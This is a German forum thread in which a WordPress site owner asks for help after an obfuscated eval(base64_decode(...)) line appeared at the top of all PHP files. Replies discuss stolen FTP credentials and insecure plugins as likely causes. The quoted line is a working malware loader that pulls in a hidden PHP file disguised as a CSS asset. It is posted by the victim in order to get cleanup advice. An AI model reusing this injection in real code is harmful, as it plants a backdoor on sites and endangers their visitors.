Alle PHP Dateien von Wordpress werder Verändert

  • Hilfe !!
    ICh habe WP 2.9 aufgespielt lief gut nach 5 Tagen wurde aber in allen PHP Datein ein code an den anfang jeder Datei geschrieben

    PHP
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3Zob3N0cy9vYmVybGF1c2l0ei1kaWdpdGFsLmRlL2h0dHBkb2NzL25pZWRlcm11ZWhsZS13ZWlzc2VuYmVyZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

    Was zufolge hat das Wordpress dan hängt .....
    wie ist das möglich das ohne ftp zugriff hintubekommen
    was ist das für ein code...
    wie kann ich es unterbinden kommischerweise habe ich neu eingespielt und nach 5 Tagen war der code wider drinn ....

    Wie kann ich den code am einfachsten entfernen da mehrere Wordpress Blogs betroffen sind die auf den server laufen ...

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • na ich hab ihn ja nicht auf den rechner der code wird ja direckt auf den server eingefügt und nicht von mir mit aufgespielt


    Das ist richtig, aber wer eben deine FTP-Passwörter auf deinem PC ausgelesen hat...

    Aber es ist auch nicht auszuschließen, dass evtl. WP 2.9 eine Lücke hat. Wahrscheinlicher sind aber unsichere Themes, Plugins oder andere Scripte auf dem Server.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • Das ist richtig, aber wer eben deine FTP-Passwörter auf deinem PC ausgelesen hat...

    Aber es ist auch nicht auszuschließen, dass evtl. WP 2.9 eine Lücke hat. Wahrscheinlicher sind aber unsichere Themes, Plugins oder andere Scripte auf dem Server.

    Ok ist schon klar aber irgendwie mus mann den code ja reinschreiben und das in alle php s wie soll das gehen ....

    auf den server sind ca 10 gb daten

    so wie dir reingeschrieben werden so müste man die ja wider runterbekommen oder

  • Hast Du Dir den Artikel eigentlich mal durchgelesen? Genau dieses Verhalten ist es das so ein Mist immer weiterverbreitet wird.

    Du fängst Dir einen Trojaner auf einer infizierten Website ein. Die meisten Virenscanner erkennen diesen momentan nicht.

    Dann sucht dieser Scanner nach installierten FTP programmen und liest die dort gespeicherten Passwörter aus.

    Diese werden verschickt und damit dann ALLE Domains ebenfalls infiziert die in dem FTP Programm drin waren. Uns zwar wie du richtig erkannt hast direkt auf dem Server. Aber um da ran zu kommen werden erstmal Deine Passwörter benötigt und die holen sie sich mit eben diesem Trojaner.

    Und so weiter und so fort. Also stell erstmal bitte sicher das es nicht dieser Trojaner ist.

  • Also Es ligt nicht am FTP zugang der ist nicht benutzt worden ich habe die logfiles durchgeschaut

    Betroffen ist eine Domain die aber mit mehrern Blogs benutzt werden

    Subdomain sind nicht betroffen

    Andere domains die auch im FTP Programm sind sind auch nicht betroffen

    wie bekomme ich nun die skripte wider sauber also die vorschläge mit Überschreiben kann man vergessen weil man nicht alle phps dabei erwischt selbst in der config stehts drinn

    gibts ein skript wo ich auf den server nach einen code suchen und verändern kann das wer eigentlich die lösung so kann mann den schädling bekämpfen ....

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!